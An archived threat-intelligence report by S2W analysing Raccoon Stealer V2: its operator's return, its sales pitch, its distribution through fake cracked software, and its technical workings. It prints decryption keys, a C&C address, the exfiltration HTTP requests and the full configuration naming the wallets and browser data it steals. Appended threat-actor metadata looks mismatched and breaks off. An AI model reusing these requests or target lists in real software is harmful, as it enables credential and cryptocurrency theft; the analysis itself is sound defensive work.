{
	"id": "df9aa04f-6a1d-4f7f-936f-21f261d98832",
	"created_at": "2026-04-06T00:15:29.960605Z",
	"updated_at": "2026-04-10T03:37:08.623299Z",
	"deleted_at": null,
	"sha1_hash": "04c5ac3a675ed9ec9d11754dc05abc75c71b0c2e",
	"title": "Raccoon Stealer is Back with a New Version",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2047789,
	"plain_text": "Raccoon Stealer is Back with a New Version\r\nBy S2W\r\nPublished: 2022-06-21 · Archived: 2026-04-05 13:44:10 UTC\r\nAuthor: S2W TALON\r\nLast Modified : 2022.06.16.\r\nPress enter or click to view image in full size\r\nPhoto by Gary Bendig on Unsplash\r\nExecutive Summary\r\nOn March 25, 2022, the operator of Raccoon Stealer, who was active on the dark web forum, temporarily\r\nsuspended his activities since a key developer died in the Russia-Ukraine War.\r\nOn May 17, 2022, the operator mentioned that the development of a new version of the stealer was\r\ncompleted, and uploaded details of changes, improvements, and prices to their Telegram channel.\r\nOn June 9, 2022, the operator resumed activities on the dark web forum where they were active and wrote\r\na comment asking for inquiries about Raccoon Stealer V2 to contact via Telegram.\r\nDuring deep \u0026 dark web monitoring, we confirmed that the Stealer log file, which is generated by\r\nRaccoon Stealer V2, has already begun to be traded and shared among cybercriminals.\r\nFrom what has been confirmed so far, it is estimated that attacks using V2 started in earnest in June after\r\nthe testing period.\r\nhttps://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d\r\nPage 1 of 17\n\nAs a result of obtaining and analyzing the Raccoon Stealer V2 sample, it was confirmed that there were no\r\nsignificant differences in the overall execution flow although many parts were changed.\r\nIt is judged that V2 will be continuously updated in the future in that there are unfinished codes compared\r\nto V1 and functions such as analysis interruption.\r\nCurrently, it is distributed in the same way as V1, disguised as Cracked Software, but as it is updated to\r\nV2, continuous monitoring is required to see if there is any change in the distribution method in the future.\r\nRaccoon Stealer Resumes Activity\r\nThe operator of Raccoon Stealer, who has been active on the dark web forum 
“Exploit”, commented saying that\r\nthe operation was temporarily suspended on his promotional post on March 25th. The “special operation” that the\r\noperator referred to in the text was known as the Russia-Ukraine War, which killed one of the key developers of\r\nthe Raccoon Stealer project, making the project no longer stable.\r\nIn a later post, the operator promised that they weren’t going out of business forever and that they would return in\r\na few months to work on a second version. It was also mentioned that since the core developers can no longer\r\nparticipate, they will redevelop a new builder program and admin panel.\r\nOn June 9th, about three and a half months later, the operator of Raccoon Stealer answered a user’s question about\r\nwhether it was right to return and worked on Raccoon Stealer V2 to transform it into a completely new stealer\r\ncompared to V1. It was also mentioned that the details will be provided after finishing the test period and that it\r\nwill be officially released in about two weeks.\r\nAfter the last post asking to inquire about V2 to contact via Telegram was uploaded, the original promotional post\r\nwas closed by the moderator so that users can no longer comment on the post to prevent confusion.\r\nThe operator of Raccoon Stealer uploaded a notice about the new version on May 17th, and they claimed that V2\r\nhas the following advantages over V1.\r\nProcesses such as generating stealer by builder program, log processing, etc. 
are all fully automated\r\nWritten in C/C++, which significantly increased the speed of work\r\nLow AV detection rate\r\nhttps://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d\r\nPage 3 of 17\n\nExpanded target to collect\r\nBuilt-in file downloader\r\nWorks on both 32 and 64-bit systems without .NET dependencies\r\nAll strings are heavily encrypted\r\nIn addition, the following features were mentioned for the admin panel.\r\nFast log processing\r\nFlexible search and filter system provided\r\nLatest log status updates\r\nCSV export, Log Preview, Browsing GEO, Mass deletion, etc\r\nThe pricing policy for the new version is as follows.\r\n$275 for 1 month of use ($75 increase over V1)\r\n$125 for 1 week of use ($50 increase over V1)\r\nIn addition to this, various improvements to the backend server and collection are specified on the telegram\r\nchannel.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d\r\nPage 4 of 17\n\nhttps://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d\r\nPage 5 of 17\n\nRaccoon Stealer. We steal, you deal!\r\nOur team is proud to present you the result of their many months of work.\r\nNever before has the process of mining logs been so easy and intuitive. And sorting is so fast and\r\nconvenient. We took care of all the routine work moments that were wasting your precious time and\r\nnerves, allowing you to concentrate on the most important thing — increasing your profits.\r\nYou can forget about the countless raising of servers and pads, assembling builds and all the hassle\r\nassociated with this. Now the process is fully automated: you just need to make a few mouse clicks.\r\nOur specialists carried out parallel development in three areas: Software, Front-end, Back-end. 
This\r\nprovided an opportunity to focus on specific tasks and get a comprehensively developed product at the\r\nfinish line.\r\nFresh software\r\n1. Own code. Our build is not a fork of already existing products on the market.\r\n2. The stealer is written in C/C++, which significantly increased the speed of work.\r\n3. Our build will give you an excellent response with every spill, because the Raccoon is noticed by a\r\nfew antiviruses in a dynamic test.\r\n4. Raccoon collects: passwords, cookies and autofill from all popular browsers (including FireFox x64),\r\nCC data, system information, almost all existing cryptocurrency desktop wallets.\r\n5. Built-in file downloader.\r\n6. Works on both 32 and 64-bit systems without .NET dependencies.\r\n7. Output file — Native x86 executable is easy to encrypt.\r\n8. Private key, gate address and all other string values are heavily encrypted.\r\nIntuitive and concise control panel\r\n1. It is so fast and simple that with its help it will not be difficult for a child to learn how to process\r\nlogs. Everything that used to take up the workspace is hidden in one click, and the necessary functions\r\nare easy to find by hover tooltips.\r\n2. The design is completely devoid of distracting and useless elements, nothing else can interfere with\r\nyour work.\r\n3. Flexible search and filter system gives you unlimited sorting options.\r\n4. The latest system of log statuses: each is marked as *new*, *open* or *double*.\r\nhttps://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d\r\nPage 6 of 17\n\n5. You can’t taste the candy without opening the wrappers. The opened status will show that the log has\r\nalready been opened.\r\n6. No more spills in several hands from unscrupulous traffickers! Duplicate logs will be marked with\r\nthe double status.\r\n6. The unique ability to delegate logs will increase the efficiency of your team. 
Everyone will receive\r\nmaterial for their needs.\r\n…\r\nChanged stealer log\r\nRecently, while monitoring the deep and dark web, a log of Raccoon Stealer V2, which is being traded and shared\r\namong cybercriminals, was newly secured. The biggest difference compared to the log in V1 is that from V2, the\r\nRaccoon-shaped signature is included in the log. Also, some field names were changed, and computer names were\r\nexcluded. Other than that, only some batches were changed, and it was confirmed that the collected data did not\r\nchange significantly.\r\nPress enter or click to view image in full size\r\nRaccoon Stealer V1 Log (Left) / Raccoon Stealer V2 Log (Right)\r\nAnalysis of New Raccoon Stealer\r\nDistributed under the guise of Cracked Software\r\nAfter a new type of log file was obtained, after analyzing various files, we succeeded in obtaining a sample that\r\nlooked like Raccoon Stealer V2. The sample was distributed through Cracked Software in the same way as other\r\nStealer malware, and it is not easy to determine whether the sample is a new version of Raccoon Stealer without\r\ncareful analysis. In addition, through the analysis of the distribution method, it was confirmed that other Stealer\r\nmalware such as RedLine Stealer were also distributed in the campaign as described in the FakeCrack Campaign\r\nrecently released by Avast.\r\nhttps://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d\r\nPage 7 of 17\n\nThe confirmed distribution site was a Cracked Software download site called “KEYS TOOL” (keystool[.]com),\r\nand when someone tries to download any program through that site, it connects to the first Redirector page in the\r\nform of “freefiles[number].xyz” domain, and the page connects to the second Redirector page using the “.cfd”\r\ndomain. 
The second Redirector page introduces a Mediafire link, and the link contains a fake installer file\r\ncontaining Stealer malware.\r\nStealer malware infection procedure\r\nTechnical Analysis of Raccoon Stealer V2\r\nThe Technical analysis of Raccoon Stealer V2 is as follows.\r\nMD5: 05a000d526a6e95be2b08e650394fa40\r\nSHA-1: b4cf85691dcc7c6e2d709b292056d404e7fb58f0\r\nSHA-256: 40daa898f98206806ad3ff78f63409d509922e0c482684cf4f180faac8cac273\r\nCreation Time: 2021-02-18 16:04:03 UTC\r\nFile name: 4.exe\r\nFile Type: x86, exe\r\nDetailed operation overview\r\n1. String decryption\r\nAs in V1, the string required for malicious behavior is extracted using Base64 and RC4 algorithms. The RC4 Key\r\nused at this time is fixed as “edinayarossiya”.\r\nEncrypted String: “VVsEvhkqyZGsN0Qv”\r\nRC4 Key: “edinayarossiya”\r\nDecrypted String: “\\cookies.txt”\r\n2. Extract the C\u0026C server address\r\nRaccoon Stealer V2 can contain up to 5 C\u0026C server addresses, which are encrypted and hard-coded with spaces\r\nin the Raccoon Stealer. Before decrypting the C\u0026C server, all spaces are removed and extracted in the same way\r\nas in 1. String Decryption. For the RC4 Key used at this time, a key different from that of other string decryption\r\nis used.\r\nEncrypted String: “lIdAg3LYd/akTgV0hVwlNF5b “\r\nRC4 Key: “403f7b121a3afd9e8d27f945140b8a92”\r\nDecrypted String: “http://2.58.56.247”\r\n3. Check the country of the infected device\r\nIt collects the “Locale Name” of the infected device through GetUserDefaultLocaleName function and checks\r\nwhether the string “ru” is included, but after checking, no other action is implemented yet.\r\n4. Create a mutex\r\nDuplicate execution is prevented through mutex. 
To prevent the malware from being started twice, the process executed\r\nlater is terminated.\r\n5. Check permission\r\nChecks whether the current process is running with “Local System” privileges. In V1, when running with Local\r\nSystem privileges, the token of explorer.exe was duplicated and executed with the privileges, but in V2, this\r\nfunction is not yet fully implemented.\r\n6. Send basic information about the infected devices\r\nThe basic information about the infected device is collected and sent first. At this time, the information includes\r\nthe “MachineGuid” and “Username” used to identify the infected device.\r\nPOST / HTTP/1.1\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nUser-Agent: record\r\n\r\nmachineId=[MachineGuid]|[Username]\u0026configId=[RC4 Key used in 2. Extract C\u0026C server address]\r\n7. Receive configuration information from C\u0026C\r\nWhen the basic information about the infected device is sent, the configuration information necessary for\r\nmalicious behavior is received from the C\u0026C Server. The entire configuration information is as follows, and it has\r\nbeen changed from the JSON format in V1 to the custom format now. 
This information includes various fields\r\nsuch as library file name and download address, target wallet software, log file name, and target local file.\r\nData format in configuration information: [Field]_[Filename]:[Detailed Information]\r\nlibs_nss3:http://2.58.56.247/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll\r\nlibs_msvcp140:http://2.58.56.247/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll\r\nlibs_vcruntime140:http://2.58.56.247/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll\r\nlibs_mozglue:http://2.58.56.247/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll\r\nlibs_freebl3:http://2.58.56.247/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll\r\nlibs_softokn3:http://2.58.56.247/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll\r\news_meta_e:ejbalbakoplchlghecdalmeeeajnimhm;MetaMask;Local Extension Settings\r\news_tronl:ibnejdfjmmkpcnlpebklmnkoeoihofec;TronLink;Local Extension Settings\r\nlibs_sqlite3:http://2.58.56.247/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll\r\news_bsc:fhbohimaelbohpjbbldcngcnapndodjp;BinanceChain;Local Extension Settings\r\news_ronin:fnjhmkhhmkbjkkabndcnnogagogbneec;Ronin;Local Extension Settings\r\nwlts_exodus:Exodus;26;exodus;*;*partitio*,*cache*,*dictionar*\r\nwlts_atomic:Atomic;26;atomic;*;*cache*,*IndexedDB*\r\nwlts_jaxxl:JaxxLiberty;26;com.liberty.jaxx;*;*cache*\r\nwlts_binance:Binance;26;Binance;*app-store.*;-\r\nwlts_coinomi:Coinomi;28;Coinomi\\Coinomi\\wallets;*;-\r\nwlts_electrum:Electrum;26;Electrum\\wallets;*;-\r\nwlts_elecltc:Electrum-LTC;26;Electrum-LTC\\wallets;*;-\r\nwlts_elecbch:ElectronCash;26;ElectronCash\\wallets;*;-\r\nwlts_guarda:Guarda;26;Guarda;*;*cache*,*IndexedDB*\r\nwlts_green:BlockstreamGreen;28;Blockstream\\Green;*;cache,gdk,*logs*\r\nwlts_ledger:Ledger Live;26;Ledger Live;*;*cache*,*dictionar*,*sqlite*\r\news_ronin_e:kjmoohlgokccodicjjfebfomlbljgfhk;Ronin;Local Extension Settings\r\news_meta:nkbihfbeogaeaoehlefnkodbefgpgknn;MetaMask;Local Extension Settings\r\nsstmnfo_System Info.txt:System 
Information:\r\nhttps://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d\r\nPage 10 of 17\n\n|Installed applications:\r\n|\r\nlibs_nssdbm3:http://2.58.56.247/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nssdbm3.dll\r\nwlts_daedalus:Daedalus;26;Daedalus Mainnet;*;log*,*cache,chain,dictionar*\r\nwlts_mymonero:MyMonero;26;MyMonero;*;*cache*\r\nwlts_xmr:Monero;5;Monero\\\\wallets;*.keys;-\r\nwlts_wasabi:Wasabi;26;WalletWasabi\\\\Client;*;*tor*,*log*\r\news_metax:mcohilncbfahbmgdjkbpemcciiolgcge;MetaX;Local Extension Settings\r\news_xdefi:hmeobnfnfcmdkdcmlblgagmfpfboieaf;XDEFI;IndexedDB\r\news_waveskeeper:lpilbniiabackdjcionkobglmddfbcjo;WavesKeeper;Local Extension Settings\r\news_solflare:bhhhlbepdkbapadjdnnojkbgioiodbic;Solflare;Local Extension Settings\r\news_rabby:acmacodkjbdgmoleebolmdjonilkdbch;Rabby;Local Extension Settings\r\news_cyano:dkdedlpgdmmkkfjabffeganieamfklkm;CyanoWallet;Local Extension Settings\r\news_coinbase:hnfanknocfeofbddgcijnmhnfnkdnaad;Coinbase;IndexedDB\r\news_auromina:cnmamaachppnkjgnildpdmkaakejnhae;AuroWallet;Local Extension Settings\r\news_khc:hcflpincpppdclinealmandijcmnkbgn;KHC;Local Extension Settings\r\news_tezbox:mnfifefkajgofkcjkemidiaecocnkjeh;TezBox;Local Extension Settings\r\news_coin98:aeachknmefphepccionboohckonoeemg;Coin98;Local Extension Settings\r\news_temple:ookjlbkiijinhpmnjffcofjonbfbgaoc;Temple;Local Extension Settings\r\news_iconex:flpiciilemghbmfalicajoolhkkenfel;ICONex;Local Extension Settings\r\news_sollet:fhmfendgdocmcbmfikdcogofphimnkno;Sollet;Local Extension Settings\r\news_clover:nhnkbkgjikgcigadomkphalanndcapjk;CloverWallet;Local Extension Settings\r\news_polymesh:jojhfeoedkpkglbfimdfabpdfjaoolaf;PolymeshWallet;Local Extension Settings\r\news_neoline:cphhlgmgameodnhkjdmkpanlelnlohao;NeoLine;Local Extension Settings\r\news_keplr:dmkamcknogkgcdfhhbddcghachkejeap;Keplr;Local Extension Settings\r\news_terra_e:ajkhoeiiokighlmdnlakpjfoobnjinie;TerraStation;Local Extension 
Settings\r\news_terra:aiifbnbfobpmeekipheeijimdpnlpgpp;TerraStation;Local Extension Settings\r\news_liquality:kpfopkelmapcoipemfendmdcghnegimn;Liquality;Local Extension Settings\r\news_saturn:nkddgncdjgjfcddamfgcmfnlhccnimig;SaturnWallet;Local Extension Settings\r\news_guild:nanjmdknhkinifnkgdcggcfnhdaammmj;GuildWallet;Local Extension Settings\r\news_phantom:bfnaelmomeimhlpmgjnjophhpkkoljpa;Phantom;Local Extension Settings\r\news_tronlink:ibnejdfjmmkpcnlpebklmnkoeoihofec;TronLink;Local Extension Settings\r\news_brave:odbfpeeihdkbihmopkbjmoonfanlbfcl;Brave;Local Extension Settings\r\news_meta_e:ejbalbakoplchlghecdalmeeeajnimhm;MetaMask;Local Extension Settings\r\news_ronin_e:kjmoohlgokccodicjjfebfomlbljgfhk;Ronin;Local Extension Settings\r\news_mewcx:nlbmnnijcnlegkjjpcfjclmcfggfefdm;MEW_CX;Sync Extension Settings\r\news_ton:cgeeodpfagjceefieflmdfphplkenlfk;TON;Local Extension Settings\r\news_goby:jnkelfanjkeadonecabehalmbgpfodjm;Goby;Local Extension Settings\r\news_ton_ex:nphplpgoakhhjchkkhmiggakijnkhfnd;TON;Local Extension Settings\r\nscrnsht_Screenshot.jpeg:1\r\ntlgrm_Telegram:Telegram Desktop\\tdata|*|*emoji*,*user_data*,*tdummy*,*dumps*\r\ntoken:1262c07cd3b0beaeb6f46b66fbfdf307\r\n8. Set the working path and download library files\r\nDownload normal library files required for collection from the C\u0026C server by referring to the libs_ field included\r\nin the configuration information.\r\nField: libs_[DLL Filename]:[Download Address]\r\nWorking Path: C:\\Users\\[Username]\\AppData\\LocalLow\r\nDownloaded DLLs\r\n— nss3.dll\r\n— msvcp140.dll\r\n— vcruntime140.dll\r\n— mozglue.dll\r\n— freebl3.dll\r\n— softokn3.dll\r\n— sqlite3.dll\r\n— nssdbm3.dll\r\n9. 
Add environment variable\r\nAdd the specific paths included within the Raccoon Stealer to the environment variable, as well as the working\r\npath specified in 8. Set working path and download library.\r\nC:\\Windows\\system32;\r\nC:\\Windows;\r\nC:\\Windows\\System32\\Wbem;\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;\r\nC:\\Users\\[Username]\\AppData\\LocalLow;\r\n[Working Path]\r\n10. Send detailed information about the infected device\r\nThe detailed information about the infected device is sent to the C\u0026C server by referring to the sstmnfo_ field in\r\nthe configuration information. The information collected and sent is as follows, and if it is successfully sent, a\r\n“receive” message is received from the server. In V1, a file containing the information is created on the infected\r\ndevice, but in V2, the information is sent directly to the C\u0026C server without creating a file.\r\nPOST /[token] HTTP/1.1\r\nAccept: */*\r\nContent-Type: multipart/form-data; boundary=[Random 16byte String]\r\nUser-Agent: record\r\nHost: 2.58.56.247\r\nContent-Length: 6854\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--[Random 16byte String]\r\nContent-Disposition: form-data; name=\"file\"; filename=\"System Info.txt\"\r\nContent-Type: application/x-object\r\n\r\nSystem Information:\r\n - Locale: Korean\r\n - Time zone: +540 minutes from GMT\r\n - OS: Windows 10 Enterprise N\r\n - Architecture: x64\r\n - CPU: Intel(R) Core(TM) i9-9880H CPU @ 2.30GH (4 cores)\r\n - RAM: 8191 MB\r\n - Display size: 2560x1331\r\n - Display Devices:\r\n 0) VMware SVGA 3D\r\nInstalled applications:\r\n [Application List]\r\n--[Random 16byte String]--\r\n11. Exfiltrate stolen data from the infected device\r\nSearch and steal the target information and files to be collected by referring to the configuration information\r\nreceived in 7. Receive configuration information from C\u0026C. 
The target information is as follows.\r\nData stored in the browser: Credentials, Profile, Autofill, Cookies, Credit card information, etc.\r\nBrowser-based wallet extension: Data for each browser-based wallet extension by referring to the\r\nconfiguration information (MetaMask, TronLink, BinanceChain, Ronin, coinomi, electrum, etc.)\r\nWallet software: By referring to the configuration information, wallet data for each wallet software\r\n(exodus, atomic, jaxx, binance, coinomi, electrum, etc.) and the “wallet.dat” file in local drives\r\nSpecific files in the local drives\r\nTelegram related data\r\nScreenshot of the infected device\r\nThe meaning of each field specified in the configuration information is given in a table in the original post (image not reproduced here).\r\n12. Support for executing additional commands and downloading additional malware\r\nIf the ldr field exists in the configuration information, additional commands or processes are executed, or\r\nadditional malware is downloaded and executed.\r\nCompare Raccoon Stealer V1 and V2\r\nCommonality\r\n1. Same packer\r\nBoth Raccoon Stealer V1 and V2 use the same packer. This packer was used not only in Raccoon Stealer, but also\r\nin Vidar, KPot, and other stealers. The characteristic of this packer is that it is difficult to know which malware is\r\nincluded by creating a binary that wraps the internal malware, and it is very difficult to create an automated\r\nunpacker tool.\r\n2. String decryption\r\nBoth V1 and V2 extract strings necessary for malicious behavior using Base64 and RC4 algorithms. 
Also, in both versions the\r\nC\u0026C server address is hard-coded in the form of a string with a lot of spaces.\r\n3. Working path\r\nThe working path used for library download and storage is also used in V2.\r\nWorking path: %USERPROFILE%\\AppData\\LocalLow\r\nDifference\r\n1. Query format\r\nRaccoon Stealer sends the MachineGuid value and username of the infected device before sending detailed\r\ninformation and stolen data. While the Token value is encrypted in the Raccoon Stealer V1, it is hard-coded in\r\nplaintext in the Raccoon Stealer V2. In addition, this value is used as the RC4 Key value for decrypting the C\u0026C\r\nserver in the Raccoon Stealer V2.\r\nQuery format in V1\r\n— b=[MachineGuid]_[Username]\u0026c=[Token]\u0026f=json\r\nQuery format in V2\r\n— machineId=[MachineGuid]|[Username]\u0026configId=[Token]\r\n2. Configuration information format\r\nRaccoon Stealer receives the configuration information necessary for malicious behavior from the C\u0026C server,\r\nand the format of the configuration information was changed in V2. In V1, JSON format was used, but V2 uses\r\na custom format using “:”, “;”.\r\n3. How to send stolen data\r\nIn V1, after creating a log file in the working path, the directory is compressed and sent to the C\u0026C server.\r\nHowever, in V2, it is no longer created as a file and immediately sent to the C\u0026C server.\r\n4. 
How to get the C\u0026C server address\r\nIn V1, Google Drive and Telegram channels were used as channels to obtain the C\u0026C server address\r\ndynamically, but in V2, this feature has not yet been confirmed and the C\u0026C server address is hard-coded in the\r\nstealer.\r\nConclusion\r\nAs a result of the analysis, it has been confirmed that this malware is the V2 version of the Raccoon\r\nStealer, and it is clear that Raccoon Stealer has resumed its operation in that Stealer logs are already being\r\ntraded and shared among cybercriminals.\r\nAs the Raccoon Stealer operator becomes active again, there is a possibility that existing users will return\r\nto Raccoon Stealer, so it is necessary to prepare for Raccoon Stealer V2.\r\nIt is judged that V2 will be continuously updated in the future in that there are still unfinished codes and\r\nfeatures compared to V1.\r\nCurrently, it is distributed in the same way as V1, disguised as Cracked Software, but as it is updated to V2,\r\ncontinuous monitoring is required to see if there is any change in the distribution method in the future.\r\nReference\r\nhttps://blog.avast.com/fakecrack-campaign\r\nhttps://medium.com/s2wblog/deep-analysis-of-raccoon-stealer-5da8cbbc4949\r\nAppendix. 
A — IoCs\r\n6e5d7b8bc69145a2b65b4be1a2d66a8dbc579e54c09660c4070c5667192864bf\r\nce29b09c57bdd0df33b7d45abe0047952fc009dbc1b5b43351aa6dad751ba262\r\n056a3022c5e70d112e82844d1101e1a591b02960ae0609f06e9930a3f3bd6efa\r\n6f4e7b117124a1b5a27dfd9a7a3e03b46e84000a992e1029f0cfb62bb77fc3f3\r\n6e7e69cd1c9b24f6a36870ec5ae6c31c69022fb48d3fdf59bcda5c1528bc9c04\r\n40daa898f98206806ad3ff78f63409d509922e0c482684cf4f180faac8cac273\r\n59d74f7e172a2ee14e5e43b9704ac95428b28741f1dbadbf5c9279dd37a11f86\r\n0fb5b0562e81ae2a89f61b25cca023adf7f370fe049508c96c6bcf898a63e4d7\r\nf051b93953919cbf673b16ba995a3c1aa58e59dcc256b9eaf1cdd2f6b3c7dfd2\r\n9d66a6a6823aea1b923f0c200dfecb1ae70839d955e11a3f85184b8e0b16c6f8\r\n084754ed1f495ee48a0bfe70b6b5c33ed17bfa129ad03356356ff3a5bf3c46f0\r\nf6d5c0f3f6c5cd498b605e06c6bf49a66c7cbbedf3480cb3a95229b4dc91e81d\r\na988a4f3652eaa34b874080da1cbb70223bac6760e318064f4f23b69bf823330\r\ne2b87b9ea8bb2bf835cb064845ff863253f3eedb4a88122598eee52c9579b203\r\nhttps://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d\r\nPage 16 of 
17\n\n03a8531989aeeec1befecbba4f3ee218309306224bd22b7e52104537e32bacd6\r\n0adc96946d9806969375212cfd5012f93cb205c1008b935f6886ba0ffe7fe262\r\n516c81438ac269de2b632fb1c59f4e36c3d714e0929a969ec971430d2d63ac4e\r\na25fd13894644550fa9ca60a046813031e5189d4abe4bbd68ed9e6dcfc85d698\r\n20ca741b731753f1bc981bfceb747dc8f4afb2aeb8694de63114a53d23812161\r\n909875959dd07c5aeb345d5f93e662329866e862eb8bb18d0727aa4d9c72e6eb\r\n99834c9981535b584040fef84af159e5e584927aac4a6a57001ba5ecf1e869c4\r\n494df1513b13c70b1472282b80bdf1a9399ae0d16a90275a5c9fe7cfda6afd0d\r\n9014f5d4a597cdec4ec2d10bf73883b4f0106f62c9938a8c6a59e506b1203e2b\r\n0bc3aa6b692b3873dfdd6942fb0eaba7aab391f1d154df80be1193aa792df0c2\r\n7503d528db92b909ad05d65379e6aae008dfaa3664bcac252d34d7a9f25b2db9\r\nf97835279804b62e667211706cce813179e2571634880770862a5f759fa17c11\r\n567bd8dd69485d8f79edad514e54c085af1490dcc5461a01ee79e57e138b9b10\r\n672fea64c92edc4d937d3132577b65813738bfddeab6a6b3ef35e6fa4b987009\r\n83fd32cace2c2f243a713f93918dafd5458af296d55edd293cf5b8b927466dc7\r\n7c09a54191495c699c04be9e0e2d97cf91d9c4346a37ad751416a2db52636de2\r\nb7104e1420fbcdd4a78b02069f32d4882d38203dcb5f73509b60cc1567dac437\r\nab3d8c58a33fd90eca17dc079eb05469bbe535b16eb653810f134df888e230ce\r\ncddc1e15fcfcb29cfcb3631f1d478640d228fd9ea38c01d347833567970d04e3\r\nc6f111e1b32229232af8af25d714ef8f77e30bbc122c0600076bb42cbe46e22b\r\n61d8e542a34f41b5675daf924a6c21322f0a6aaad9a888b23357c85d29a8f87a\r\n6dfd4a12437cf38a4ecdb24891dbff464602fcbe435cf6c15a643637d7f4e1b0\r\nc7ee80a9387a941d13738ab069f8f055e14ea8bdb12403a81e0166b098fce032\r\nae46253a19c9e846c405b3926655efead40d8f873fef008f896019f34d486dfe\r\n9e5035f075d6aef29ad158c591adf669324a17442c575c6946c5a7f279705f47\r\n6697604c88f0fbb05a6848915d1800eb9a77b607e834c6a01e2bf4a076955a91\r\nd2831378b440b653984e58ba82bd670f30eca0e4f23f14c248c50780883d32c3\r\n2c7563c76c710a3988c14b8246fd8864c37c08b723b0a24e0f4aa876cc5f73c8\r\n502f0a6587cf2d084e98f5edc12192e1ca37515bdf7364511415d615be2e6aa7\r\nSource: 
https://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d"
	],
	"report_names": [
		"raccoon-stealer-is-back-with-a-new-version-5f436e04b20d"
	],
	"threat_actors": [
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
